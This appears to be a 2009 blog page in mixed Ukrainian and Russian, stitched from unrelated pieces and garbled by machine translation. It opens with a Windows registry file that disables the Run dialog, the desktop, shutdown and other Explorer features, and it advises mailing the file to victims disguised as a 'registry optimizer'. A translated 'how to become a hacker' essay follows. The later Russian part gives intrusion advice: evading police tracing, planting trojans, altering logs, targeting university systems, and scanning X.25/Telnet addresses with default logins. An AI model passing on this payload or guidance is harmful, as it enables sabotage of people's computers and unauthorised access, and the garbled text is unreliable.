[HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionPoliciesExplorer]
"NoChangeStartMenu" = DWORD: 1
"NoClose" = DWORD: 1
"NoCommonGroups" = DWORD: 1
"NoFavoritesMenu" = DWORD: 1
"NoFind" = DWORD: 1
"NoRecentDocsMenu" = DWORD: 1
"NoRun" = DWORD: 1
"NoSMHelp" = DWORD: 1
"NoSMMyDocs" = DWORD: 1
"NoSetFolders" = DWORD: 1
"NoSetActiveDesktop" = DWORD: 1
"NoSetTaskbar" = DWORD: 1
"NoTrayContextMenu" = DWORD: 1
"NoDesktop" = DWORD: 1

Після створення файлу готового Ви просто клацає на його 2 рази.
Як впарить Чи є: у пошті, щоб послати як пачілку на який або приводить на дискету і говорити, що цей тип регістратура оптимізатора, але якщо поруч з Вами гарна пам'ять, яка є простою, щоб запам'ятати пар цих рядків.
Так тут - якщо за пару пляшок пива Вас попросять оживити винду, що все, Все що вам потрібно зделать це, змінити одинички в нулики і на початку змінених файлік! І залізку переребутіть але тільки не чарівною кнопкою в тілі а по человечески (Завершити сеанс користувача).

Хакурство, книги хакерства, як стать хакером, взлом почти.

А ти записався в хакери?

2009-02-01T23:44:00.000-08:00

Хто такий хакер? Можна знайти купу визначень для терміну "хакер", більшість з яких пов'язане з технічною компетентністю та задоволенням, одержуваних від вирішення проблем та подолання перешкод. Але якщо ж ви хочете знати, як стати хакером, то дійсно істотними є два аспекти.
Имеется некоторое сообщество, некая общая культура, яка складається із досвідчених програмістів та мережевих чарівників, яка в свою чергу веде свою історію від перших мінікомп'ютер з поділом часу і від самих ранніх експериментів з мережею ARPANET. Члени цієї культури і дали народження терміну "хакер". Хакери побудували Internet. Хакери зробили операційну систему Unix тим, чим вона є сьогодні. Хакери ведуть Usenet. Хакери забезпечують роботу World Wide Web. Якщо ви є частиною цієї культури, якщо ви внесли в неї свій внесок, і інші члени цієї культури знають - хто ви і називають вас хакером, то ви - хакер.
Хакерська погляд на світ не обмежується лише культурою хакерів-програмістів. Є люди, які застосовують Хакерська підхід і до інших речей, на кшталт електроніки або музики. В дійсності, ви можете зустрітися з цим підходом на вищих рівнях будь-якої науки чи мистецтва. Софтверні хакери визнають таких близьких за духом людей і теж можуть називати їх "хакерами", деякі навіть проголошують, що Хакерська природа на самом деле не залежить від середовища, в якому працює хакер.
Є й інша група людей, голосно називає себе хакерами, але вони ними не є. Це ті люди (головним чином, молодь чоловічої статі), кого тяга за злом комп'ютерних та телефонних систем. Справжні хакери називають таких людей "крекерамі" і не бажають мати з ними нічого спільного. Справжні хакери в більшості своїй вважають крекеров лінивий, безвідповідальними і не дуже розумними. Те, що людина здатна зламати систему безпеки, не робить його хакером, точно так само, як вміння угоняют тачки не робить вас автомобільним майстром. На жаль багато журналісти та письменники введені в оману і використовують слово "хакер" для опису крекеров, і це нескінченно дратує справжніх хакерів.
Головне розходження в наступному: хакери будують речі, а крекери їх ламають.
Якщо ви хочете стати хакером, то продовжуйте читання. Якщо ви хочете стати крекером, то прямуйте читати Ньюз-групу alt.2600і оголосіте відсидіти від п'яти до десяти років у в'язниці, коли виявите, що не настільки вправно наскільки вважали.

наверх
Хакерська підхід.

Хакери вирішують проблеми і будують речі, вони вірять в свободу і в добровільну взаємодопомогу. Для того, щоб вас сприймали як хакера, ви повинні вести себе так, як якби це була ваша власна позиція. А для того, щоб вести себе так, ніби це ваша позиція, ви повинні дійсно вірити в цю позицію.
Але якщо ви розраховуєте культивувати хакерських підходи лише для отримання визнання в культурі, то ви упустили суть.
Стати такою людиною, хто вірить в подібні речі - це важливо для вас, тому що це допоможе вам навчитися і підтримає прагнення. Як і в будь-якому іншому творчості, найефективніший спосіб стати майстром - це наслідувати світогляду майстрів, не тільки інтелектуально, але й також емоційно.
Так що якщо ви хочете стати хакером, то повторюйте наступні речі, поки не повірите в них:
 Світ сповнений чарівною проблем, що чекають свого рішення.
Бути хакером - це величезне задоволення, але це задоволення такого роду, яке вимагає маси зусиль. Для таких зусиль потрібна мотивація. Атлети-чемпіони черпають мотивацію з свого роду фізичного задоволення, одержуваного від доведення власного тіла до досконалості, від подолання власних фізичних меж. Подібно до цього, щоб бути хакером ви повинні отримувати максимум задоволення від рішення проблем, від оттачіванія своїх навичок, від тренування свого інтелекту.
Якщо ж ви не з тих, хто відчуває подібні речі природним чином, то вам знадобиться стати таким, щоб зробитися хакером. В іншому випадку ви виявите, що вся ваша Хакерська енергія вичерпана такими подразників, як секс, гроші і успіх в суспільстві.
Ви також повинні розвинути щось віри у ваші власні здібності до навчання. Віри в те, що навіть якщо ви можливо і не знаєте всього, що необхідно для вирішення проблеми, але якщо ви освоїли лише шматочок і на цьому навчилися, то вже знаєте достатньо, щоб вирішити і наступний шматок - і так далі, поки все не буде зроблено.
 Ніхто і ніколи не повинен вирішувати проблему двічі.
Творчі мізки - це цінний і обмежений ресурс. Не слід розтрачує їх на переізобретеніе колеса, коли навколо чекає так багато чудових нових проблем.
Щоб поводитися як хакер, ви повинні вірити, що час роздумів інших хакерів - дорогоцінне, причому настільки, що майже моральним боргом для вас є поділитися інформацією. Вирішити проблеми, а потім просто роздати рішення, щоб інші хакери могли вирішувати нові проблеми замість того, щоб беспрестанно повертатися до старих.
Від вас не потрібно вірити, що ви зобов'язані роздати всі плоди своєї творчості, хоча ті хакери, хто так робить, - найбільш шановані серед інших хакерів. З цінностями хакеров цілком узгоджується продаж плодів творчості, достатній для забезпечення вас їжею, покровом і комп'ютерами. Узгоджується це і з використанням ваших хакерських навиків для підтримки сім'ї і навіть для того, щоб розбагатіти, поки займаючись цим ви не забуваєте, що є хакером.
 нудьга і рутина - це зло.
Хакери (і взагалі творчі люди) ніколи не повинні займати нудними речами або погрязать в рутині монотонної роботи, тому що коли це відбувається, то це означає, що вони не роблять того, що можуть робити лише вони - вирішувати нові проблеми. Подібне марнотратства шкодить кожному. Тому нудьга і рутина - це не просто неприємні речі, це зло.
Щоб поводитися як хакер, ви повинні вірити в це так, щоб бажати автоматизації всіх нудних дрібниць настільки, наскільки це можливо, і не тільки для себе, але і для всіх (особливо для інших хакерів).
Але іноді хакери займаються речами, які можуть здатися монотонних або нудними сторонньому спостерігачеві, в якості вправи для прочищення мізків або ті ж для вироблення навика.Лібо ж для придбання особливого роду досвіду, який неможливо отримати іншим шляхом. Але все це робиться за власним вибором, ніхто з вміють думати ніколи не повинен примушувати до нудною роботі.
 Свобода - це благо.
Хакери за своєю природою антіавторітарни. Будь-хто, хто може віддати вам наказа, може зупинити рішення вами будь-який з проблем, вас зачарувати. І, враховуючи образ мислення авторитарних мізків, знайдуться які-небудь приголомшливо ідіотські причини, щоб це зробити. Так що з авторитарним підходом слід битися усюди, де ви його зустрінете, щоб він не душив вас і інших хакеров.
Це не те ж саме, що боротися з усіма владою. Дітям потрібно керівництво, злочинність потрібно стримувати. Хакер може погоджуватися на ухвалення якогось роду керівництва, коли є можливість отримати те, що потрібно і не надто багато часу витрачатися на виконання наказів. Але це обмежена розумна операція, щось подібне до особистої поступки.
Авторитаризм процвітає в умовах цензури і секретності. Його адепти не вірять в добровільну співпрацю і в ділення інформацією, їм подобатися тільки таке "співробітництво", яким керують вони. Тому, щоб поводитися як хакер, ви повинні виробити в собі інстинктивні неприйняття цензури, секретності, а також застосування сили або брехні для примушення відповідальних дорослих людей. І діяти необхідно виходячи з такої віри.
 Позиція не замінить компетентність.
Для того, щоб бути хакером ви повинні розвинути деякі з перерахованих підходів. Але вхопити лише підходи ви спроневіритеся хакером не в більшою мірою, чим спортсменом-рекордсменом або рок-зіркою. Для того, щоб стати хакером, потрібен інтелект, практика, самовідданість і тяжка праця.
Тому вам доведеться навчитися з недовірою ставитися до позиції, але з повагою до компетентності будь-якого роду. Хакери не дозволяють позерам розтринькувачів їх час, але вони поклоняються компетентності, особливо хакерской компетентності, але компетентність хороша в чому завгодно. Особливо цінується володіння такими необхідними навиками, які мало у кого є. А найкраще - це компетентність в таких навичках, які вимагають проникливо розуму, вправності і концентрації.
Якщо ви боготворить компетентність, то ви отримуєте насолоду, розвиваючи її в собі. Тяжка праця і відданість стануть для вас захоплюючою грою, а не рутиною. І це життєво необхідно для того, щоб стати хакером.

наверх
Основні навички.

Хакерська погляд на життя - це важливо, але майстерність - багато разів важливіше. Позиція не замінить компетентності, і існує певний набір базових навичок, якими вам необхідно володіти, перш ніж будь-який з хакерів те подумав назвати хакером і вас.
Цей базовий набір з часом потихеньку змінюється у міру того, як технологія породжує нові навики і робить непотрібними застарілі. Наприклад, зазвичай згадувалося програмування на машинному мовою, але аж до недавнього часу в набір не включали мову HTML. Однак, в сьогоднішній комплект цілком безумовно входять наступні компоненти:
 Навчитеся програмувати.
Це, звичайно ж, фундаментальний Хакерська навичку. Якщо ж ви не знаєте жодного комп'ютерного мови, рекомендуємо почати з мови Python. Він зрозуміло розроблений, добре документовано і відносно доброзичливців до новачків. Незважаючи на те, що він гарний для першого мови, це не просто іграшка. Це потужний і гнучкий мову, добре підходить для великих об'єктів.
Але знайте, що ви не зможете хакерському рівня майстерності (або рівня хорошого програміста), якщо будете знати тільки одну мову програмування. Вам необхідно навчитися мислити про проблеми програмування взагалі, незалежно від будь-якого конкретного мови. Щоб бути справжнім хакером, вам треба досягти рівня, на якому ви зможете вивчити нову мову за декілька днів, співвідносячи положення керівництва з тим, що вам вже відомо. Це означає, що вам слід вивчити декілька дуже різних мов.
Якщо ви займаєтеся серйозним програмуванням, то вам доведеться вивчити Сі, основну мову операційної системи Unix (хоча це і не та мова, який слід намагатися вивчити першим). Інші мови першорядної важливості для хакерів - це Perl та Lisp. Мова Perl має сенс вивчити з практичних міркувань: він дуже широко використовується для активних Web-сторінок і системного адміністрування, так що навіть якщо вам і ніколи не доведеться писати на Perl, ви повинні навчитися його читати. Lisp варто вивчити ради тих глибоких освічених знань, які ви знайдете, коли нарешті його освоїте. Ці пізнання зроблять вас прекрасним програмістом на все життя, навіть якщо ви ніколи особливо і не будете використовувати сам Lisp.
Найкраще, на самом деле, вивчити всі чотири цих мови (Python, C, Perl та Lisp). Крім того, що це найважливіші хакерських мови, вони демонструють дуже різні підходи до програмування і кожен з них навчить вас цінним речам.
Ми не можемо дати тут розгорнуті інструкції щодо того, як навчитися програмувати - це складне мистецтво. Але можемо сказати вам, що книги і курси цьому не навчать (багато, можливо, більшість хакерів - це самоучка). Що цьому учить, так це читання кодів і написання кодів.
Навчитися програмувати - це як навчитися писати гарним природним мовою. найкращий спосіб для цього - почитати щось з написаного майстрами, потім написати трохи самому; прочитати більше, написати трохи більше; прочитати ще більше, написати ще більше ... І повторювати цей процес до тих пір, поки ваші програми не разовьются в щось потужне і економічне.
Відшукати хороші коди для читання раніше було складно, тому що було дуже мало великих програм, доступних у вихідних кодах і придатних для вивчення і виникає юних хакерів. Нині ситуація кардинально змінилася: програми в початкових кодах, программістскій інструментарій та операційні системи тепер широко доступні. Тому ...
 Дістаньте один з варіантів Unix в початкових кодах, навчіться його використовувати і з ним працювати.
Вважаємо, що ви маєте персональний комп'ютер або можете отримати до нього доступ. Єдиний і найважливіший крок, який будь-який з новачків може зробити для придбання хакерських навиків, - це роздобути копію Linux або одній з версій BSD-Unix, встановити її на персональній машині і запустити.
Так, в світі є і інші операційні системи окрім Unix. Але їх поширюють в двійковому вигляді - ви не зможете читати коди і не зможете їх модифікувати. Вчитися хакерством на машинах під DOS, Windows або MacOS - це все одно, що вчитися танцювати повністю загіпсованним.
Крім того, Unix - це операційна система Internet. Хоча ви можете навчитися використовувати Internet і не знаючи Unix, але ви не можете бути Internet-хакером, не розуміючи Unix. З цієї самої причини сьогоднішня Хакерська культура є досить сильно Unix-сконцентруватися. (Це не завжди було так, і деяким з колишніх хакерів таке положення справ не дуже до вподоби, але симбіоз між Unix та Internet став настільки міцний, що навіть сили Microsoft не вистачає, щоб серйозно на це вплинути).
Так що заводить собі Unix, найкраще Linux, але є й інші варіанти (ви можете працювати як під Linux, так і під DOS / Windows на одній і тій же машині). Вивчите цю ОС. Працюйте з нею. Возітесь з нею. Спілкуйтеся через неї з Internet. Читайте коди. Модифікує їх. Ви отримаєте такий программістскій інструментарій (включаючи C, Lisp і Perl), про який кожна з ОС Microsoft і не мріяла. Ви отримаєте задоволення, і ви засвоїте більше знань, ніж припускали в процесі навчання, коли оглянитесь на цей процес вже будучи майстром-хакером.
 Навчитеся використовувати World Wide Web і писати на HTML.
Більшість з тих речей, що створені хакерской культурою роблять свою справу невидимо, допомагаючи працювати фабрикам, установам і університетам без скільки-небудь помітного впливу на життя не-хакерів. WWW - це одне велике виключення, гігантська блискуча Хакерська іграшка, яка навіть по визнанню політиків змінює світ. Лише з однієї цієї причини (а також і безлічі інших приємних причин) вам слід навчитися працювати з Web.
Це не означає, що потрібно просто навчитися керувати браузером (це будь-який вміє), але й навчитися писати на HTML, мові розмітки документів Web. Якщо ви ще не вмієте програмувати, то писання на HTML навчить ваше мислення деяким корисним звичкам, які стануть у нагоді при освоєнні мов програмування. Так що робіть домашню сторінку. Але просте володіння домашньої сторінки навіть і близько не поведе вас до того, щоб стати хакером. У Web повним-повнісінько домашніх сторінок. Більшість з них - це безглуздий, непрацюючий мотлох. Вкрай кидка і привабливо оформлений непотріб, безперечно, але все одно непотріб.
Щоб бути стоящей, ваша сторінка повинна мати "контент" - зміст. Вона повинна бути цікавою та / або корисною для інших хакерів.

наверх
Хакерська культура.

Як і більшість культур без грошової економіки, Хакерландія будується на репутації. Ви намагаєтеся вирішити цікаві проблеми, але наскільки вони цікаві, і наскільки хороші ваші рішення, - це щось таке, про що зазвичай можуть судити тільки (у технічному сенсі) рівні вам або що перевершують вас.
Таким чином, коли ви граєте у хакерському гри, ви вчитеся вести рахунок головним чином по тому, що думають про вашу майстерність інші (саме тому ви не будете хакером до тих пір, поки вас не стануть так називати інші хакери). Даний факт затеняют як образ хакера-одинака, так і певні табу Хакерська культури, не допускають, щоб чиєсь его чи зовнішні визнання взагалі могли бути мотивацією для хакера.
Зокрема Хакерландія - це те, що антропологи називають "культурою дарів". Ви заробляєте статус і репутацію не тим, що керувати іншими людьми, і не тим що прекрасні, і не тим, що є речі, які є предметом жадання інших. Але швидше тим, що роздає речі. Зокрема, одарівая своїм часом, своєю майстерністю і результатами своєї творчості.
Є п'ять основних типів речей, які ви можете робити, щоб вас поважали хакери:
 Пишіть програм з відкритим вихідним кодом.
Перше - це писати програми, які інші хакери вважають забавними або корисними, і роздавати початкові коди програм для використання всієї хакерской культурою.
Таку роботу називали "вільно-доступним програмним забезпеченням" (free software), але це приводить у замішання деяких людей, точно не розуміють, що мається на увазі за словом "вільно-доступне". Тепер для такого програмного забезпечення багато хто воліє використовувати термін "з відкритим вихідним кодом" або "Open-source software". Найбільш шанованих напівбоги Хакерландіі - це люди, які написали великі і талановиті програми, що відповідають найширшим потребам, і які роздали їх всім, так що кожен тепер їх використовує.
Допомагайте тестувати і отлажівать програми з відкритим вихідним кодом.
Почитаемы также те, кто тестирует и отлаживает программы с открытым исходным кодом. В этом несовершенном мире мы неизбежно затрачиваем самую большую часть времени разработки программы на фазу отладки. Именно поэтому любой думающий автор программ с открытым кодом скажет вам, что хорошие бета-тестеры (знающие, как внятно описать симптомы, хорошо локализующие проблемы, способные исправлять опечатки и применяющие несколько простых диагностических подпрограмм) ценятся на вес золота. Всего один такой человек может превратить фазу отладки из затянутого изнуряющего кошмара в просто полезную задержку.
Если вы новичок, то попытайтесь найти разрабатываемую программу, которая вам интересна, и станьте хорошим бета-тестером. Существует вполне естественный путь продвижения от помощи в тестировании программ к помощи в их отладке и далее к помощи их модификации. Вы многому научитесь таким способом и породите добрую карму в отношениях с людьми, которые помогут вам впоследствии.
Публикуйте полезную информацию.
Еще одна хорошая вещь - отбирать и накапливать полезную и интересную информацию на Web-страницах или документов типа ЧаВО (FAQ или "часто задаваемые вопросы и ответы"), и делать их общедоступными.
Ведущие основных технических ЧаВО почти столь же уважаемы, как и авторы программ с открытым исходом кодом.
Помогайте поддерживать работу инфраструктуры.
Хакерская культура (и инженерная разработка Internet) основана на добровольцах. Имеется масса необходимой, но не особо эффективной работы, которую нужно делать, чтобы поддерживать процесс: администрирование рассылочных листов, модерирования новостных групп, управление большими архивами программного обеспечения, разработка RFC и других технических стандартов.
Люди, хорошо делающие такого рода вещи, глубоко уважаемы, поскольку каждый знает, что подобная работа требует кучу времени и не так забавна как игры с кодами. Это работа свидетельствует о самоотверженности.
Служите самой хакерской культуре.
Наконец, вы можете служить и распространять саму культуру. Но этим не стоит заниматься до тех пор, пока вы не поваритесь в этом достаточное время и не станете хорошо известны благодаря одной из четырех первых вещей.
В хакерской культуре нет явных лидеров, но здесь есть "культурные герои", "племенные старейшины", историки и ораторы. Когда вы достаточно долго поживете в этих траншеях, то сможете вырасти в одного их таких людей. Но остерегайтесь: хакеры настороженно относятся к своим крикливым племенным старейшинам, так что видимое достижение такого рода славы таит в себе опасность. Вместо того, чтобы стремиться к этому, вам лучше как бы не заботиться об этом и тогда это само упадет на колени, а уж затем можно стать скромным и милостивым в своем статусе.

наверх
Хакер - "придурок"?

Вопреки расхожему мифу, вам не обязательно быть придурком, чтобы быть хакером. Это, однако, помогает, и многие хакеры действительно "придурки". Статус изгоя общества помогает вам оставаться сосредоточенными на действительно важных вещах, таких как размышление и хакерство.
Именно по этой причине многие хакеры носят ярлык "придурок" и даже используют в качестве знака доблести более грубый термин "кретин" - это их способ декларации своей независимости от общепринятых в обществе оценок.
Если вы способны в достаточной степени сосредоточиться на хакерстве, достигать здесь заметных результатов и при этом иметь личную жизнь - что ж, прекрасно. Сегодня это намного легче. Культурный мейнстрим стал теперь намного дружелюбнее к техно-придурком . Есть даже растущее количество людей, обнаруживающих, что хакеры зачастую могут быть вполне качественными любовниками и супругами.
Если же вас влечет к хакерству по той причине, что у вас нет личной жизни, что ж, и это неплохо. По крайней мере, у вас не будет проблем с концентрацией. А личная жизнь - как знать, может она придет позже.

Искусство взлома.

Хакинг - это искусство взлома всевозможных систем и доведение данного процесса до высот технического изящества. Хакер вооружается различными методиками, исходя из которых он строит собственную стратегию взлома той или иной программы. Зачем же быть хакером? Вы наверняка найдете для себя несколько причин. Для некоторых, например, это в первую очередь просто прекрасное развлечение. Но сейчас заниматься хакингом становиться все более опасно, поэтому будьте осторожны, даже если у вас нет противозаконных намерений. Это очень трудоемкое и к тому же рискованное дело. Так что будьте внимательны и не попадитесь.
Как не пойматься?
Жизнь прекрасна, только когда вы не попадетесь в руки спецслужб. Конечно, это зависит от того, чем вы занимаетесь. Но может получиться так, что вы все равно попадетесь, несмотря на беспрекословное выполнение следующих рекомендаций.
Некоторые операторы спецслужб очень настойчивы, и не остановятся, пока не вычислят и не прижмут вас к стенке. И если, как только вы берете трубку телефона, мгновенно подключаются модемы или если до вас доходят слухи, что друзья-приятели называют вас "хакером, на след которого напали спецслужбы", то лучше вам затаится на какое-то время и не заниматься взломом.
Существует несколько основополагающих моментов, которые обязан знать каждый, использующий модем при компьютерном взломе. Вы постоянно должны быть начеку и следить за появлением таких настораживающих явлений, как:
1. Необычные шумы на линии, при том, что обычно их не бывает.
2. По телефонной линии прослушиваются другие голоса.
Это иногда случается со старым оборудованием FDM, но может быть вызвано и ответвлением провода.
3. Появление фургона, припаркованного рядом с:
а) телефонным столбом;
б) подземным паровым вентиляционным отверстием.
Если вы заметили что-нибудь из вышеуказанного, прекращайте все упражнения по крайней мере на месяц. И обязательно убедитесь, что фургон уехал, а не просто поменял место парковки.
Обратите внимание на провода, протянутые от фургона к телефонному столбу или вентиляционному отверстию. Также следует выяснить не принадлежит фургон телефонной компании.
4. Наличие незнакомого вам оборудования в нежилых комнатах вашего дома обязательно должно вас насторожить.
5. С вашей телефонной линией происходит что-то странное, и вы уверены в том, что соседи не имеют к этому никакого отношения.

наверх
Ответвление провода.

На сегодняшний день этот способ вычисления хакеров остается самым распространенным. Выявить отклонение провода можно так. Если вы в состоянии позволить себе приобрести соответствующее оборудование, то сможете заниматься тем, что называется "чистка" телефонной линии. Еще во время телефонного разговора напряжение резко падает, то означает, что от вашего телефона ответвлен провод или кто-то подключился к линии. Возможные показания прибора:
Напряжение, которое должно вас насторожить - 90V при 20-30Hz
На линии - 30-50V
Среднее напряжение- 600V. В модеме может сгореть MOV. Обычно при таком напряжении телефонная сеть неисправна.

наверх
Определение номера.

Спецслужбы используют еще один способ определения местонахождения хакера. На сегодняшний день вычисление телефонного номера стало доступным практически каждому. Недавно было обнаружено, что если набрать 33 на некоторых телефонах, то на аппарате высветится номер последнего звонка.
И полиция пользуется именно такими телефонами для вывода вас на чистую воду. Но все это, в основном, касается радиотелефонов, а не обыкновенных городских линий. Радиотелефонная связь всегда была известна своей надежностью, но, конечно же, не сейчас: Потому что такая телефонная станция - одно из самых лучших мест для занятия хакингом. Но лучше не предпринимайте ничего подобного в своем доме. Самое подходящее для хакинга время - ночь, когда дежурный оператор спецслужб наверняка спит.

наверх

Считывание RFI.

Это один из новейших способов вычисления хакеров, но его-то не стоит бояться. Для выполнения он слишком сложен, и к тому же не всегда срабатывает. Особенно если вы находитесь в окружении телевизоров и мониторов. Считывание RFI осуществляется с помощью устройства, которое ловит слабые радиочастоты вашего монитора и переводит их в видеосигналы. И если это срабатывает, то оператор видит на своем компьютере изображения с вашего монитора. Все это, конечно, впечатляет, но этот оператор еще должен сначала поймать ваш сигнал.

наверх
Система ESS.

Ко всем радостям прибавляется еще одна - Standardized Switching (или ESS). Когда ее вводили, то говорили, что она нужна для разгрузки телефонной линии. Но единственная цель этой системы - ловить хакеров. Это единственное к чему она предназначена, и надо сказать, что делает это она очень неплохо. С ее помощью телефонная компания может вычислить любой номер за 55 секунд. В системе регистрируются записи всех телефонных звонков, в том числе и местных. И даже если ваш телефон не исправен, то ваша попытка с него куда-то позвонить станет тут же известна полиции. Но эта система еще не конец света.

Хакерская этика.

Пока существует компьютер, существуют и хакеры. В 50-х годах в массачусетском институте технологии (MIT) студенты посвятили много времени и энергии изобретению компьютеров. Правила и закон игнорировались. Так как их привели в восторг итоги исследований, так наши исследования приводят в восторг и нас. Торжество хакера заключается не в нарушении закона, а в волнующем процессе исследования и накопления знаний. Некоторые рекомендации, чтобы не попасть в неприятное положение, но чтобы не повредить те компьютеры, которые станут объектом вашего профессионального внимания:
 Не вредить преднамеренно ни одной системе.
 Не изменять никаких системных файлов, кроме необходимых вам для дальнейшего доступа (троянские кони, изменения в старых логах и т.п.)
 Не оставлять никаких настоящих данных в системах, взломанных вами (перед использованием нового программного продукта по взлому необходимо проверить, не оставляет ли он ваш ID там, где вы побывали)
 Не оставлять ваш реальный номер телефона никому, кого вы не знаете.
 Не трогать правительственные компьютеры.
 Наконец, вы должны понять, что можете прочесть все пособия в мире и прослыть знатоком, но пока вы не начнете реально работать, все ваши знания равны нулю.
Одно из самых безопасных мест для начала хакерской карьеры - компьютерная система института. Университетские компьютеры имеют слабую защиту, и часто используются хакерами, поскольку каждый компьютер используется множеством людей, мало вероятно, чтобы вас реально вычислили среди юзеров, если вы были обнаружены.

наверх
Сеть Telnet..

Лучшее место для тренировок начинающего хакера - одна из больших сетей типа Telnet. Почему? Во-первых, на сетях имеется огромное разнообразие компьютеров, есть из чего выбирать. Во-вторых, сети довольно хорошо продокументированы. Проще найти кого-то, кто может вам помочь с проблемой Telnet, чем искать помощи относительно вашего местного компьютера колледжа или средней школы. Третье, сети более безопасны. Из-за огромного числа запросов, которые приходят каждый день по большим сетям, фактически тяжело отследить, откуда и какой запрос сделан. Также очень просто маскировать ваше проникновение, используя сеть, которая делает ваше хобби намного безопасным.
Telnet имеет большое количество компьютеров, соединенных в сеть, чем любая другая система в мире, от Telnet вы можете иметь доступ к Tymnet, ItaPAC, Janet, DATAPAC, SBDN, PandaNet, THENET и целому набору других сетей.
Первый шаг, который вы должны сделать, идентифицировать ваш местный порт дозвона. Сначала вы получите подсказку, говорящую:
ТЕРМИНАЛ=
Это - ваш type терминала. Если вы имеете vt100 эмуляцию, напечатайте это в ответ на запрос. Или нажмите возврат, и она станет стандартной установкой для режима терминала ввода-вывода.
Теперь вы получите подсказку в виде значка @. В ответ напечатайте:
@c mail
и затем будет запрос об имени пользователя. Введите "phones" для имени пользователя. Когда система запросит пароль, введите снова "phones". Начиная с этого момента, это - управляемое меню. Используйте его, чтобы определить ваш общий dialup. Когда вы вызываете ваш local dialup, вы еще раз пройдете запрос:
ТЕРМИНАЛ=
и еще раз вы будете представлены перед @. Эта подсказка сообщает, что вы соединены с Telnet PAD. PAD обозначает или Ассемблер/дизассемблер пакета (если вы говорите с инженером), или Public Access Device (если вы говорите с представителями маркетинга Телнета). Первое описание более правильно.
Telnet работает, собирая данные, которые вы вводите на PAD с которым вы соединены, связывая информацию в куски по 128 байтам (обычно, но цифра может быть изменена), и затем передавая их на скорости в пределах от 9600 до 19200 бода на другой, который получает данные и передает их компьютеру или системе, с которой имеется соединение. Изначально, PAD позволяет соединить два компьютера, которые имеют различные скорости или протоколы связи, на длинном расстоянии. Иногда можно заметить запаздывание в отдаленном ответе машин. Это называется Задержкой PAD, и предназначено для ожидания, пока вы пошлете данные через несколько различных линков.
Что вы делаете с этим PAD? Вы используйте его, чтобы соединиться с отдаленными компьютерными системами, печатая "С" для соединения и затем Сетевой Адрес Пользователя (NUA) системы, к которой вы хотите идти.
Если нет возможности соединения, вы получите сообщения типа:
refused collect connections
в сопровождении кодов ошибки, идущих справа, и система вернет вас в @ prompt.
Имеются два пути, чтобы двигаться в обход сообщения - Refused Collect. Первый - использование сетевого ID пользователя (NUI). NUI - это имя пользователя/pw комбинация, которая подобно кредиту по открытому счету на Telnet.
Второй способ соединение состоит в том, чтобы использовать частный PAD или через что-нибудь подобное Netlink от Главного компьютера. Префикс в Telnet NUA часто (но не всегда) относится к телефонному коду города, где находится компьютер (то есть, 713ххх обозначало бы компьютер в Хьюстоне, штат Техас). Если специфическая область, интересующая вас, например Нью-Йорк (код 914), вы можете набрать:
@C 914 001
Если соединение прошло, вы получите сообщение об этом и перейдете к 914 002. Делайте это, пока не найдете интересных систем для занятия ими.
Не все системы находятся на простом ххх ууу адресе. Некоторые составлены из четырех или пяти цифр (914 2354), а некоторые имеют десятичные или числовые расширения (422 121А = 422 121.01). Вы можете заниматься ими, но вы никогда не знаете, что можете найти.
Полное сканирование префикса займет десять миллионов вариантов. Например, если нужно просмотреть 512, то необходимо начать с 512 00000.00 и пройти до 512 00000.99, а затем увеличить адрес на 1 и пройти от 512 00001.00 до 5120001.99.
Имеется множество компьютеров для просмотра с тремя номерами, так что не стоит заниматься безумством с большими расширениями.
Иногда при попытке соединения будет проходить одна или две минуты ожидания. В этом случае, вы можете прервать связь посредством жесткого разрыва, затем, после того, как вновь система выдаст
@ prompt
Наберите "D" для отсоединения.
Outdials.
Кроме компьютеров, NUA может подключить вас к некоторым другим вещам.
Одна из наиболее полезных - outdial. Outdial, это не более чем модем, которым можно заняться по telnet - подобно концепции преследования PC, за исключением того, что тут не используются пароли.
После соединения, вы получите сообщение, подобное
Hayes 1200 bode outdial, Detroit, MT
или
VEN-TEL 212 Modem
или, возможно
Session 1234 established on Modem 5588
Лучший способ выяснить команды состоит в том, чтобы напечатать "H" или "Help" - это даст вам всю информацию, которая вам необходима.
Подсказка по безопасности: когда будете взламывать какую-нибудь систему через телефонный дозвон, всегда используйте outdial или diverter, особенно, если это местный номер. Многие люди занимаются хакингом на местных компьютерах.
Другая хорошая уловка, которую вы можете применить с outdial - использования повторного набора или функцией макрокоманды, которую многие из них имеют. Первая вещь, которую надо сделать после соединения, вызвать "Повторный набор последнего номера" (Redial last number). Это будет номер того человека, который использовал канал до вас. Запишите его, поскольку никто не вызвал бы номер без наличия компьютера на нем. Это - хороший способ найти новые системы для хакинга. Для VENTEL-модема наберите "D", и вам будет показано пять номеров, сохраненных как макрокоманды в памяти модема.
И наконец, вы можете соединяться с тем, что называется "X.25 Communication PAD", получив несколько больше материала, сопровождаемого подсказкой @. Это PAD точно такой же как тот, с которым работаете вы, за исключением того, что все предпринятые подключения объявляются PAD, позволяя вам соединяться теми узлами, которые ранее отказались от подключения.
Когда пакет передан от Pad к Pad, он содержит заголовок, в котором размещена информация о вашем местоположении. Например, когда вы вначале соединяетесь с Telnet, вам может быть сообщено
212 44A Connected
если вы звоните с кода города 212. Это означает, что вы вызвали номер 44A PAD в 212 области.
21244A будет поставлено на заголовке всех отправляемых пакетов.
Как только вы соединяетесь с частным PAD, все пакеты, выходящие от вас будут иметь этот адрес на них, но не ваш. Это может быть достаточным буфером между вами.

наверх
Идентификация ОС.

Не имеет значения, как вы нашли компьютер, это могло произойти через сеть, или могло при помощи сканирования телефонного префикса вашей университетской сети. Здесь не будет объясняться, что можно сделать, как только вы окажитесь внутри какой-либо операционной системы. Здесь будет рассказано как идентифицировать и распознать некоторые операционные системы и как приблизиться к хакингу в них, как иметь дело с тем, чего вы никогда не видели прежде.
VMS.
VAX компьютер создан Digital Equipment Corporation (DEC), и выполняет VMS (виртуальная система памяти) операционную систему.
VMS определяется по подсказке:
USENAME
Она не будет сообщать вам, если вы ввели неправильное имя пользователя, и отсоединит вас после трех неудачных попыток входа в систему. Также она следит за всеми неудачными попытками входа в систему и сообщает владельцу учетную запись при его следующем выходе в сеть.
Это - одна из наиболее безопасных операционных систем, что касаемо защиты от внешнего проникновения, но и здесь имеется много уловок для обхода защиты. VAX также имеет лучший набор справочных файлов. Только наберите "HELP" и читайте.
DEC-10.
DEC-10 более ранние модели оборудования компьютера DEC, запускающие TOPS-10 операционную систему. Эти машины могут быть опознаны по подсказке ".".
